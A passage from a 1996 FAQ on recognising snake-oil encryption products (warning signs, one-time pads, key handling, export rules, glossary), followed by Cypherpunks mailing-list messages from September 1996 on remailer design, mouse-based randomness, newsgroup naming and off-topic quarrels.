Logarithm Problem), where the cryptosystem is based on computations on
points of an elliptic curve over a finite field, for example, has been shown
to be resistant to brute-force attacks with much smaller keys than other
discrete log problem-based ciphers. Ciphers based different problems have
different key size requirements. Each type of algorithm's key size
requirements depend on the mathematical problem on which the system is
based. So, it's important to find out what algorithm (or at least
mathematical problem the algorithm uses) and key size is used. One without
the other is meaningless.

Implementation Environment

Other factors that can influence the relative security of a product are
related to its environment. For example, in software-based encryption
packages, is there any plaintext that's written to disk (perhaps in
temporary files)? What about operating systems that have the ability to swap
processes out of memory on to disk? When something to be encrypted has its
plaintext counterpart deleted, is the extent of its deletion a standard
removal of its name from the directory contents, or has it been written
over? If it's been written over, how well has it been written over? Is that
level of security an issue for you? Are you storing cryptographic keys on a
multi-user machine? The likelihood of having your keys illicitly accessed is
much higher, if so. It's important to consider such things when trying to
decide how secure something you implement is (or isn't) going to be.

Some Common Snake-Oil Warning Signs

The following are some of the "red flags" one should watch for when
examining an encryption product

   * Technobabble

     The vendor's description of the product may contain a lot of
     hard-to-follow use of technical terms to describe how the product
     works. If this appears to be confusing nonsense, it may very well be
     (even to someone familiar with the terminology). Technobabble is a good
     means of confusing a potential user and masking the fact that the
     vendor doesn't understand anything either.

     A sign of technobabble is a description which drops a lot of technical
     terms for how the system works without actually explaining how it
     works. Often specifically coined terms are used to describe the scheme
     which are not found in literature about cryptology.

     Further, if the marketing material isn't clear, what reason is there to
     believe that the instructions are any better? Even the greatest of
     products, if not used properly, can be rendered useless. If you can't
     understand what a vendor is saying, you're most likely better off
     finding something that makes more sense.

   * New Type of Cryptography?

     Beware of any vendor who claims to have invented a "new type of
     cryptography" or a "revolutionary breakthrough". Truly "new
     breakthroughs" are likely to show up in the research literature, and
     professionals in the field are typically won't trust them until after
     years of analysis, by which time they are not so new anymore.

     Avoid software which claims to use 'new paradigms' of computing such as
     cellular automata, neural nets, genetic algorithms, chaos theory, etc.
     Just because software uses a different method of computation doesn't
     make it more secure. (As a matter of fact, these techniques are the
     subject of ongoing cryptographic research and nobody has published
     successful results based on their use yet.)

     Anything whose authors claim to have invented a new public key
     cryptosystem without publishing the details or underlying mathematical
     principles is highly suspect. Modern cryptography is grounded in
     mathematical theory. The security is based on problems that are known
     (or widely believed) to be hard to solve.

     It's important to understand the difference between a new algorithm or
     cipher and a new product. Engaging in the practice of developing
     ciphers and cryptographic products is a fine thing to do. However, to
     do both, at the same time, is foolish. Many snake oil vendors brag
     about how they do this, despite the lack of wisdom in such activity.

     The strength of any encryption scheme is only proven by the test of
     time. New crypto is like new pharmaceuticals, not new cars. In some
     ways, though, it's worse: if some pharmaceutical company has some bogus
     stuff out there, people will start getting really sick. If you're using
     bogus crypto, you likely won't have any idea that your secrets aren't
     as secret as you think.

   * Secret Algorithms

     Avoid software which uses secret algorithms. Security through obscurity
     is not considered a safe means of protecting your data. If the vendor
     does not feel confident that the method used can withstand years of
     scrutiny by the academic and professional crypto community, then you
     should be wary of trusting it. (Note that a vendor who specializes in
     cryptography may have a proprietary algorithm which they'll show to
     others if they sign a non-disclosure agreement. If the vendor is
     well-reputed in the field, this can be an exception. On the other hand,
     if you don't know which vendors are and aren't reputable, you can't
     take their words for it. You're typically best off avoiding that which
     is secret.)

     Beware of specially modified versions of well-known algorithms. This
     may intentionally or unintentionally weaken the cipher.

     The use of a trusted algorithm, with technical notes explaining the
     implementation (or better yet, availability of the source code for the
     product itself) are signs that a vendor is confident about their
     product's security. You can take the implementation apart and test it
     yourself. A lock where attackers can see the internal mechanisms, and
     still not be able to break it is a strong lock, indeed.

     A common excuse for not disclosing how a program works is that "hackers
     might try to crack the program's security." While this may be a valid
     concern, it should be noted that such 'hackers' can reverse engineer
     the program to see how it works anyway. If the program is implemented
     properly and the algorithm is secure, this is not a problem. (If a
     hypothetical 'hacker' was able to get access you your system, access to
     encrypted data might be the least of your problems.)

   * Experienced Security Experts and Rave Reviews

     Beware of any product claiming that "experienced security experts" have
     analyzed it, but it won't say who (especially if the scheme has not
     been published in a reputable journal).

     Don't rely on reviews in newspapers, magazines or television shows,
     since they generally don't have cryptologists (celebrity hackers who
     know about telephone systems don't count) to take the software apart
     for them.

     Just because the vendor is a well known company or the algorithm is
     patented doesn't make it secure either.

   * Unbreakability

     Some vendors will claim their software is "unbreakable". This is
     marketing hype, and a common sign of snake-oil. Avoid any vendor that
     makes unrealistic claims. (If it sounds too good to be true, it
     probably is.)

     No algorithm is unbreakable. Even the best algorithms are breakable
     using "brute force" (trying every possible key), but if the key size is
     large enough, this is impractical even with vast amounts of computing
     power.

     One-time pads are unbreakable, but they must be implemented perfectly,
     which is, at best, very difficult. See the next section for a more
     detailed discussion.

     Some companies that claim "unbreakability" actually have serious
     reasons for saying so. Unfortunately, these reasons will generally turn
     out to depend on some narrow definition of what it means to "break"
     their security. For example, true one time pads are technically
     "unbreakable" as far as secrecy goes, but only if several difficult and
     important conditions also hold. Even then, they are trivially
     vulnerable to known plaintext attacks on the message's integrity. Other
     systems may be "unbreakable" only until one of the communicating
     devices (a laptop, for example) is stolen.

     So, be sure to find out exactly what the "unbreakable" properties of
     the system are, and decide if the more breakable portions also provide
     adequate security. Often, less experienced vendor representatives will
     roll their eyes and say, "Of course it's not unbreakable if you do
     such-and-such." The point is that the exact nature of "such and such"
     will vary from one product to another. Pick the one that matches your
     operational needs the best.

   * One-Time-Pads

     A vendor might claim the system uses a one-time-pad (OTP), which is
     theoretically unbreakable. (Technically, OTP-generated ciphertext has
     an equal chance of being each possible plaintext. For example, "598v *$
     _+~xCtMB0" has equal probabilities of decrypting to "the whole year
     in", "the hole youre in", and "you are a weenie!") Snake-oil sellers
     will try to capitalize on the known strength of an OTP. It is important
     to understand that any variation in the implementation (which is often
     done to get around the inherent key management problems of OTPs) means
     that it is not an OTP, and has nowhere near the security of an OTP.

     An OTP system is not an algorithm. It works by having a "pad" (called
     such because originally paper pads were used, before general-purpose
     computers came into being) of random bits in the possession of both the
     sender and recipient, but absolutely no one else. (The pad must be sent
     from one to the other securely, such as in a locked briefcase
     handcuffed to the carrier, and that sort of thing.) The message is
     encrypted using the next n bits in the pad as they key, where n is the
     number of bits in the message. After the bits are used from the pad,
     they're destroyed, and can never again be used. The bits in the pad
     must be truly random, generated using a real random source, such as
     specialized hardware, radioactive decay timings, etc., and not from an
     algorithm or cipher. Anything else is not a one-time-pad. Further, if
     the keys (i.e., random bit "pads") are provided by the vendor, the
     quality of these cannot be verified. How do you know that they aren't
     sending the same bits (or some trivial mutation thereof) to everyone?
     Or keeping a copy for themselves? Or selling a copy to your competitors
     or enemies?

     OTPs are highly impractical for general purpose cryptography, since the
     need for random bits is very high, and key management is so cumbersome.
     OTPs are only practical for extremely low bandwidth communication
     channels where two parties have the means to exchange pads through a
     different method from that of their messages. (It is rumored that a
     link from Washington, D.C., to Moscow was (is?) encrypted with an OTP.)

     A lesson from the VENONA project (see NSA's web site) is that OTPs are
     seriously vulnerable if a pad is ever reused. It does not take the
     resources of a government agency to crack a reused pad. Therefore, the
     real limitation to their practical use is the generation and
     distribution of truly random keys for them. You have to distribute at
     least one bit of key for every bit of data transmitted, including any
     encrypted protocol data that's sent. If you reuse your pads you run the
     risk of compromising all data sent with the reused pad.

     The vendor might (or might try to) confuse random session keys or
     initialization vectors with OTPs.

   * Algorithm or product XXX is insecure

     Be wary of anything that makes claims that particular algorithms or
     other products are insecure without backing up those claims (or at
     least citing references to them).

     Sometimes attacks are theoretical or impractical (requiring special
     circumstances or massive computing power running for many years), and
     it's easy to confuse a layman by mentioning these. These usually
     involve either trying every possible combination of bits for form keys,
     and trying every possible key until a solution is found, factoring
     large numbers, or some other cryptanalysis that's just as
     computationally intensive as one of these methods.

   * Keys and Passwords

     The "key" and the "password" are not the same thing. The "key"
     generally refers to the actual data used by the cipher, while the
     "password" refers to the word or phrase the user types in, which the
     software converts into the key (usually through a process called
     "hashing" or "key initialization").

     The reason this is done is because the characters a user is likely to
     type in do not cover the full range of possible characters. (Such keys
     would be more redundant and easier for an attacker to guess.) By
     hashing a key can be made from an arbitrary password that covers the
     full range of possible keys. It also allows one to use longer words, or
     phrases and whole sentences as a "passphrase", which is more secure.

     If the system limits the size of the key or passphrase to something
     that seems too low, it probably is. If the actual "password" is the
     cipher's key (rather than hashing it into a key, as explained above),
     avoid it.

     If the vendor confuses the distinctions between bits, bytes and
     characters when discussing the key, avoid this product.

     Convenience is nice, but be wary of anything that puts too much
     emphasis on ease of use, without due consideration to cryptographic
     strength. Avoid anything that lets anyone with your copy of the
     software to access files, data, etc. without having to use some sort of
     key or passphrase.

     Avoid anything that doesn't let you generate your own keys (ie, the
     vendor sends you a key in the mail, or it's embedded in the copy of the
     software you buy).

     Avoid anything by a vendor who does not seem to understand the
     difference between public-key (asymmetric) cryptography and secret-key
     (symmetric) cryptography.

   * Lost keys and passwords

     If the vendor (or a third party) claims it can recover lost passwords
     (without using a key-backup or escrow feature), avoid it: a flaw is
     obviously present, and used to retrieve the contents of an encrypted
     message.

     If there is a key-backup or escrow feature, are you in control of the
     backup, or does the vendor or someone else hold a copy of the key? (Is
     someone else able to recover your key as easily as you can?) Remember,
     you have no security against someone who has your key.

   * Exportable from the USA

     If the software is made in the US, can it be exported? If the answer is
     yes, chances are it's not very strong. Strong cryptography is
     considered munitions in terms of export from the United States, and
     requires approval from the State Department. Chances are if the
     software is exportable, the algorithm is weak or it is crackable (hence
     it was approved for export).

     If the vendor is unaware of export restrictions, avoid the software:
     the vendor is not familiar with the state of the art. (For example, if
     someone claims that the IDEA cipher is exportable from the US, while
     most other vendors (or the State Department!) do not make such
     assertions, they're probably lacking sufficient clue to provide you
     with strong cryptographic software.)

     Because of export restrictions, some legitimate (not-Snake Oil)
     products may have a freely exportable version for outside of the USA,
     which is different from a separate US/Canada-only distribution. (Of
     course, a freely exportable version isn't secure, since it probably
     just uses a much smaller key, one that could be easily broken.) Also
     note that just because software has made it outside of the US does not
     mean that it is exportable: sometimes a utility will be illegally
     exported and posted on an overseas site. There are no restrictions on
     importing crypto products into the US, so a foreign vendor can legally
     offer a single, secure version of a product for the entire world.

   * "Military Grade" Encryption

     Many crypto vendors claim their solution is "military grade." This is a
     term with no real meaning, since there isn't a real metric by which
     something can be judged "military grade," except for it to be actually
     used by various armed forces. Since they don't reveal what they're
     using, it's neither possible to prove nor to disprove something as
     being "military grade." Some good crypto products unfortunately also
     use this term. (Watch for this one especially in combination with other
     snake oil indicators, i.e., "our military grade encryption system is
     exportable from the US!")

Other Considerations

Interface isn't everything: user-friendliness is an important factor, but if
the product isn't secure then you're better off with something that is
secure (if not as easy to use).

No product is secure if it's not used properly. You can be the weakest link
in the chain if you use a product carelessly. Do not trust any product to be
foolproof, and be wary of any product that claims it is.

Glossary
 algorithm       A procedure or mathematical formula. Cryptographic
                 algorithms convert plaintext to and from ciphertext.

 cipher          Synonym for "cryptographic algorithm"

 cryptanalysis   To solve or "break" a cryptosystem.

 escrow          A third party able to decrypt messages sent from one
                 person to another. Although this term is often used in
                 connection with the US Government's "Clipper" proposals,
                 it isn't limited to government-mandated ability to access
                 encrypted information at will. Some corporations might
                 wish to have their employees use cryptosystems with escrow
                 features when conducting the company's business, so the
                 information can be retrieved should the employee be unable
                 to unlock it himself later, (if he were to forget his
                 passphrase, suddenly quit, get run over by a bus, etc.)
                 Or, someone might wish his spouse or lawyer to be able to
                 recover encrypted data, etc., in which case he could use a
                 cryptosystem with an escrow feature.

 initialization  One of the problems with encrypting such things as files
 vector          in specific formats (i.e., that of a word processor,
                 email, etc.) is that there is a high degree of
                 predictability about the first bytes of the message. This
                 could be used to break the encrypted message easier than
                 by brute force. In ciphers where one block of data is used
                 to influence the ciphertext of the next (such as CBC), a
                 random block of data is encrypted and used as the first
                 block of the encrypted message, resulting in a less
                 predictable ciphertext message. This random block is known
                 as the initialization vector. The decryption process also
                 performs the function of removing the first block,
                 resulting in the original plaintext.

 ITAR            International Traffic in Arms Regulations. These are the
                 rules by which munitions (including cryptography), as
                 defined by the US State Department, may (or may not) be
                 exported from the US.

 key             A piece of data that, when fed to an algorithm along with
                 ciphertext, will yield plaintext. (Or, when fed to an
                 algorithm along with plaintext, will yield ciphertext.

 random session  This is a temporary key that is generated specifically for
 key             one message. Typically, in public key cryptosystems, the
                 message to be sent is encrypted with a symmetric key that
                 was specifically generated for that message. The encrypted
                 version of that message, as well as the associated session
                 key can then be encrypted with the recipient's public key.
                 When the recipient decrypts the message, then, the system
                 will actually decrypt the message it gets (which is the
                 ciphertext message and the symmetric key to decrypt it),
                 and then use the symmetric key to decrypt the ciphertext.
                 The result is the plaintext message. This is often done
                 because of the tremendous difference in the speed of
                 symmetric vs. asymmetric ciphers.

Contributors

The following folks have contributed to this FAQ.

Jeremey Barrett <jeremey@forequest.com>
Gary Ellison <gary.f.ellison@att.com>
<fifersl@ibm.net> 
Larry Kilgallen <KILGALLEN@Eisner.DECUS.Org>
Dutra Lacerda <dutra.lacerda@mail.telepac.pt>
<geeman@best.com>
Jim Ray <liberty@gate.net>
Terry Ritter <ritter@io.com>
Robert Rothenburg <wlkngowl@unix.asb.com>
Adam Shostack <adam@homeport.org>
Rick Smith <smith@sctc.com>
Randall Williams <ac387@yfn.ysu.edu>
Jim Ray <liberty@gate.net>

References

  1. B. Schneier, Applied Cryptography, second edition, John Wiley & Sons,
     1996
  2. M. Blaze, W. Diffie, R. L. Rivest, B. Schneier, T. Shimomura, E.
     Thompson, M. Wiener, "Minimal Key Lengths for Symmetric Ciphers to
     Provide Adequate Commercial Security," available from
     ftp://ftp.research.att.com/dist/mab/keylength.ps

-- 
C Matthew Curtin                MEGASOFT, INC                Chief Scientist
I speak only for myself.  Don't whine to anyone but me about anything I say.
Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet
cmcurtin@research.megasoft.com http://research.megasoft.com/people/cmcurtin/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 28 Sep 1996 12:03:09 +0800
To: jbugden@smtplink.alis.ca
Subject: Re: Public Schools
In-Reply-To: <9608278438.AA843856542@smtplink.alis.ca>
Message-ID: <199609280109.UAA00349@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


James said:
> ronsimpson@unidial.com wrote:
> >I hate to burst any bubbles but, the school with the highest number
> > of National Merit Finalists and highest number of 1600 SATs is a=20
> > Public High School (Jefferson High in Fairfax, VA)
> The same is true for Montreal (Royal Vale) using the equivalent scoring methods.
> But there are public schools at both extremes of the curve.
> While it is true that Private Schools would not survive due to market forces if
> they did consistently poorly, it is also true that they filter their incoming
> student body in a manner that Public Schools can not.
> If you want to refuse those who are too stupid or anti-social from Public
> Schools in order to improve the social or intellectual climate, you better have
> a solution for the resulting cast-offs.
 
     There is a solution. Trade Schools, and Parental Envolvement. It could 
very well be (and if I had the money I'd make the bet) that _many_ of the 
"troubled" youth of today are simply undisiplined. (Fortunately, most of 
them couldn't afford to bet against their parents in an AP world). It would
also seem to follow that if parents were spending their own money (or 
perceived it as their own money) that they would take a greater interest in
their childrens education.
   
      For those that are truly not scholastically oreinted, there would be
trade schools. I would also bet that you could teach a child everything they
need to learn (other than a trade) to cope in this world in about 4 years. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 29 Sep 1996 02:15:25 +0800
To: Cypherpunks@toad.com
Subject: Re: Mousepad RNG's?
Message-ID: <199609281551.IAA03203@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:14 PM 9/27/96 +0200, Anonymous wrote:
> I just downloaded a copy of the beta version of Datafellows
> Windows 3.1 SSH and it asked to move the mouse around to
> generate some randomness.  In reading Applied Crypto, it
> mentioned that there is no such thing as generating
> randomness from a personal computer unless something like
> a Geiger counter is used.  Is there any way to create a
> fairly random sample from the mouse? Should one use lots
> of jerky movements, or take ones time with it?

In this case the entropy is the negative of the logarithm of 
the probability that you or someone else could exactly 
duplicate those mouse movements.  I would guess that you 
get at least three bits a second just doodling around, so 
half a minute of doodles (a pretty long time) should be unbreakable.

Some time ago, at a cypherpunks conference, people were making 
all sorts of ridiculous proposals for being really, really, 
really, sure that you had real entropy, and a prominent 
cypherpunk, possibly Tim May, said, "This is ridiculous:  
Nobody ever broke good crypto through weakness in the 
source of truly random numbers".  Sometime after that 
Netscape was broken through weakness in the source of 
truly random numbers.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Sat, 28 Sep 1996 05:40:24 +0800
To: Cypherpunks@toad.com
Subject: Mousepad RNG's?
Message-ID: <199609271814.UAA15991@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


I just downloaded a copy of the beta version of Datafellows
Windows 3.1 SSH and it asked to move the mouse around to
generate some randomness.  In reading Applied Crypto, it
mentioned that there is no such thing as generating
randomness from a personal computer unless something like
a Geiger counter is used.  Is there any way to create a
fairly random sample from the mouse? Should one use lots
of jerky movements, or take ones time with it?

Thanks!


P.VonL.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 28 Sep 1996 13:45:12 +0800
To: cypherpunks@toad.com
Subject: Making Remailers Widespread
Message-ID: <199609280358.UAA02589@dfw-ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I've been thinking about how to make one-way remailers a 
widespread commodity, rather than the novelty item they are today.
Doing two-way remailers would be better, but that's still a hard problem,
and I don't want to widely deploy shoddy two-way-remailers.

Suppose we add form-based remailer support to a popular SSL-equipped
HTTP server, such as Apache-SSL, by putting remailer.pl and a 
remailer form in the default setup, which would deploy hundreds of remailers
with minimal effort.  What would we have to do to make it work well,
rather than turn into a public relations disaster and spam explosion?

- The remailer script would have to add disclaimers at the beginning
and/or end of the message reminding readers that the message is
anonymous, and to contact the remailer cabal rather than the postmaster.

- Blocking becomes a big problem - it's annoying enough now,
when there are a small number of remailers with hard-working operators;
we'd need some sort of automated blocking support to make it
usable by relatively non-involved operators

- A centralized block list (e.g. http://www.remailer.net/block.txt)
which all of the form-based remailers could load and reference would
allow non-picky operators not to have to handle it themselves

- Implementing the blocking list as a web form for people who
want to be blocked would make it relatively painless to use;
remailer-operators wouldn't have to transcribe email from the
remailer-operators list to use it, which helps with other problems.

- Of course, once anybody can fill out their name and ask to be
blocked, it's possible for spoofers to block people who don't want to be.
One approach for preventing this is to implement a three-way handshake 
        - user fills out form, form mails back blocking notice with cookie, 
                user returns cookie to complete blocking
        - this is a bit messier for mailing lists, but we can ignore...
        - special-case for "postmaster", who may want to block
                all of foo.domain instead of just postmaster@foo.domain
        - special-special-case for postmasters of big sites, e.g. aol, netcom,
                who we may want to ignore?
- A sender-blocking list is harder, and may still take human attention

- remailer chaining - allow user to put in another Apache-remailer site
        so we don't have to limit the chaining to known short list of sites.
        The remailer.pl can send an https foo.bar.com remailer.pl PUT
- The remailer form can probably just have field for second site, if empty
don't use.
        I suppose remailer.pl could also automagically add that in when it
posts.

Technical question:
- How do we initiate an http or https PUT from a script?
        I assume there's probably some perl add-in for posting http/https?
        Is there a command-line-shell interface that can fetch URLs?


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 28 Sep 1996 11:35:24 +0800
To: cypherpunks@toad.com
Subject: Re: Possible subs attack????
In-Reply-To: <843834821.2722.0@fatmans.demon.co.uk>
Message-ID: <HsyXuD44w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


The lying sack of shit Timmy May <paul@fatmans.demon.co.uk> writes:
> >     whose list is this, and why am I on it? Please delete my name
> >   now.
>
> I have noticed a lot of these messages on the list over the last day
> or two, I can only assume Vilus/Detweiller/Some other troublemaker
> has decided to subscribe a few people using fake return addresses,
> anyone else got any ideas on what else could have caused people to be
> subscribed?

The lying sack of shit Timmy May lies again, as usual.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sat, 28 Sep 1996 09:18:04 +0800
To: Robert Hettinga <cypherpunks@toad.com
Subject: Re: In defense, sort of, of Phill Hallam-Baker
In-Reply-To: <v03007810ae71885f7102@[206.119.69.46]>
Message-ID: <199609272142.PAA14851@InfoWest.COM>
MIME-Version: 1.0
Content-Type: text/plain


    you are absolutely right, as difficult as it is to remain
passively  disengaged from annoying mosquitos....

wrong:

        sorry Phill for my criticisms, but you're still fucking
clueless...

right:




--
  "To what do you owe your success in acting?"
    "Honesty.  Once you've learned how to fake that, you've got it
made."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sat, 28 Sep 1996 09:34:34 +0800
To: Black Unicorn <cypherpunks@toad.com
Subject: Re: active practice in America
In-Reply-To: <Pine.SUN.3.94.960927175024.24094F-100000@polaris>
Message-ID: <199609272225.QAA15967@InfoWest.COM>
MIME-Version: 1.0
Content-Type: text/plain


In <Pine.SUN.3.94.960927175024.24094F-100000@polaris>, on 09/27/96
   at 05:51 PM, Black Unicorn <unicorn@schloss.li> said:



I do not currently have an active practice in the United States.

Should a project come along within those boarders which interests

me, that might change.  I do not foresee that happening however.

        I presumed that  --it's a plus!  I never did, and never will.

        the research and the smell of blood (if channeled to real
    justice) is immensely satisfying --it is the members of the
    American club, and the intendent body trading which turns my
    stomach --that, and 'kill' based compensation.

        the difference in civil v. common law origined justice is not
    the code...

        to put it another way: in criminal procedings: I would rather
    be considered guilty, until proven innocent; than I would be
    presumed innocent, until proven guilty beyond a reasonable doubt.

        a nation whch can base a conviction on conspiracy to commit a
    crime, or permits circumstantial evidence to close the gap towards
    'beyond a reasonable doubt,'  has lost any pretense of understand-
    ing the heritage of common law: the Magna Carta.

--
  Of course the US Constitution isn't perfect;
    but it's a whole lot better than what we have now.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Kenney <saken@chardos.connix.com>
Date: Sat, 28 Sep 1996 14:07:35 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymous Mail at US Post
In-Reply-To: <32488092.4B8B2A3A@best.com>
Message-ID: <dyf8f0.3w1@chardos.connix.com>
MIME-Version: 1.0
Content-Type: text/plain


Greg Kucharo wrote:
: 
: I don't know if anyone else has seen this, but I was mailing letters
: in the "out front" boxes the other day when I noticed a sign.  The sign
: said that all packages 16 ounces or over had to be taken inside for
: disposal into the mail slot. The obvious explanation being that even
: though you can abstain from marking a return address, the postal
: inspectors would like a nice photo of you with your mail.
 
Note that neither the USPS or the Postal inspection service really want
anything to do with this crap. This was mandated by the FAA which
threatened to stop allowing the mails to be carried on domestic
passenger flights.

- 
     scott kenney * saken@chardos.connix.com * freebsd hacker * toriphile
                    disgruntled postal worker * aimee-fan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sat, 28 Sep 1996 15:01:20 +0800
To: cypherpunks@toad.com
Subject: Re: Public Schools
In-Reply-To: <199609280109.UAA00349@smoke.suba.com>
Message-ID: <v03007800ae72776fcbd0@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:02 AM +0000 9/28/96, attila wrote:

>        a very unusual situation  --but I live in rural southern utah
>    where the regional middle school of 1200 can support 4 bands, the
>    top 2 being very impressive, and provide full AP classes, and ACT

Wow! Utah is teaching AP?  Is Jim Bell being brought in as a Special Lecturer?

(I knew Idaho has special Militia classes, but to hear that Utah is now
teaching Assassination Politics is pretty impressive.)

--Tim

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@prairienet.org>
Date: Sat, 28 Sep 1996 13:34:39 +0800
To: dlv@bwalk.dm.com
Subject: Re: Newsgroup proposal: misc.anonymous
Message-ID: <199609280340.WAA00202@bluestem.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: dlv@bwalk.dm.com, cypherpunks@toad.com
Date: Fri Sep 27 22:31:14 1996
> "Mark M." <markm@voicenet.com> writes:
> > In an effort to get anonymity and message pools more widespread, I
>  think it
> > would be a good idea to establish a newsgroup for anonymous message
>  pools tha
> > would get the same distribution as any other newsgroup in the "big 8".
>   The
> > "misc" hierarchy is probably the best place for such a newsgroup since
>  it
> > already carries groups like "misc.misc" and "misc.test".  Does anyone
>  have an
> > suggestions or objections?
> 
> It should be under misc.activism: misc.activism.anonymity or even
>  m.a.privacy.

This doesn't seem entirely appropriate for a message-pool group, which
is what I understood as the original idea.  m.a.anonymity would be
a great place for a discussion group, though.

dave



- ----- David E. Smith, P O Box 324, Cape Girardeau MO USA 63702
dsmith@prairienet.org        http://www.prairienet.org/~dsmith
send mail with subject of "send pgp-key" for my PGP public key
"Madness takes its toll . . . please have exact change ready."
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMkycBTVTwUKWHSsJAQFuXgf7BWoshYYQ4qIjBLpZznba90iDlkCOgBBr
dyAQDohGs8euJcUxAYejmg2MufekGR5KlhSq7qlqutF7b0ngcgQj0OtDboZz4M3y
SIDZtealn5f6rNCz/r8utgc5hhUrkxJty9zYWphJxesBzSqWWw9yq5zU+7m0uKj0
9P3zN+9ezWpF9F45XH/c1NX9pIrJSax7n1ONYg6SyuSX+WfhFKSlFGHseBi7kV8f
5B/PhPFpYwCKfiqiW4Wang5qOqXzojXdddWOyBTTRoSxXHGoGlxcZ+aat+A7moI8
yjzwyDW2MA+yRLN0Z8a9rbIhuaBgpsqNL+fU5nFqaXOv98ZPiXcJDQ==
=Zj+K
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@prairienet.org>
Date: Sat, 28 Sep 1996 13:32:49 +0800
To: cypherpunks@toad.com
Subject: Re: Newsgroup proposal: misc.anonymous
Message-ID: <199609280340.WAA00327@bluestem.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Fri Sep 27 22:31:58 1996
remailer@cypherpunks.ca blathered thusly...
> This sounds like a good idea.  I would certainly vote for such a news
> group.  Should the name be misc.anonymous or misc.anonymous.messages?
> Are alt.anonymous and alt.anonymous.messages basically to different
> newsgroups for exactly the same purpose, or is there some difference
> between them.

I believe that a.a is for discussion, and a.a.m is the "message pool."

dave




- ----- David E. Smith, P O Box 324, Cape Girardeau MO USA 63702
dsmith@prairienet.org        http://www.prairienet.org/~dsmith
send mail with subject of "send pgp-key" for my PGP public key
"Madness takes its toll . . . please have exact change ready."
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMkycMjVTwUKWHSsJAQFiOwf+K5IdIzZim++s9mRK9K0cIG1Ofh6+kWhV
R9nrR8EglLTxOw97JdOIGhWeGFivWmU5IDbKaDVDnZFp3b14FWUu4680K5jRjGIU
3/M2DzKHOLKiZmoSkpBIuCYQ4IolrH4mBOMqNUpI/+mN0ORdDZ+ybfX4ThxTfabR
jxDNAMSbhmls9SNpBOyYPV9bWCdrhSXyQ4jE8g5lljDa6YZX8fToBN6uIyEC6DJ2
t2FwLLWGhs9VKQPFwg9guguN3yFEYi9hVtrjHyFTzva3Vj/algpukdTTMXvLXV9N
4bVwULnh58X0J3ov9+vd4LOXWAlYD6b7ejbqZ8mw3NBJkzeAJyzmVw==
=CfWp
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Patricia Gibbons <wa6ube@ix15.ix.netcom.com>
Date: Sat, 28 Sep 1996 15:14:49 +0800
To: talon57@well.com
Subject: [CRYPTO] (was: sig/noise ratio)
In-Reply-To: <199609271930.MAA04776@well.com>
Message-ID: <324CBFD1.6BCB@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Brian D Williams wrote:
> 
> In the interest of those who wish a significant increase in the
> signal/noise ratio I make a proposal. Significant crypto related
> posts could be prefaced with [CRYPTO] on the subject line on a
> strictly volunteer basis, that way those desiring a more topical
> list could have one simply by setting the appropriate filter.
> 
> Items crypto related but missing the [CRYPTO] header could be
> reposted by well meaning souls.
> 
> Other appropriate headers could of course be used.
> 
> Brian

I will be the first on my block to 2nd this excellent idea!
-- 

Trish, WA6UBE@ix.netcom.com "The Vertical Skywave Girl" ...
Mobile repair shop supervisor - City of San Jose/ ITD-Communications
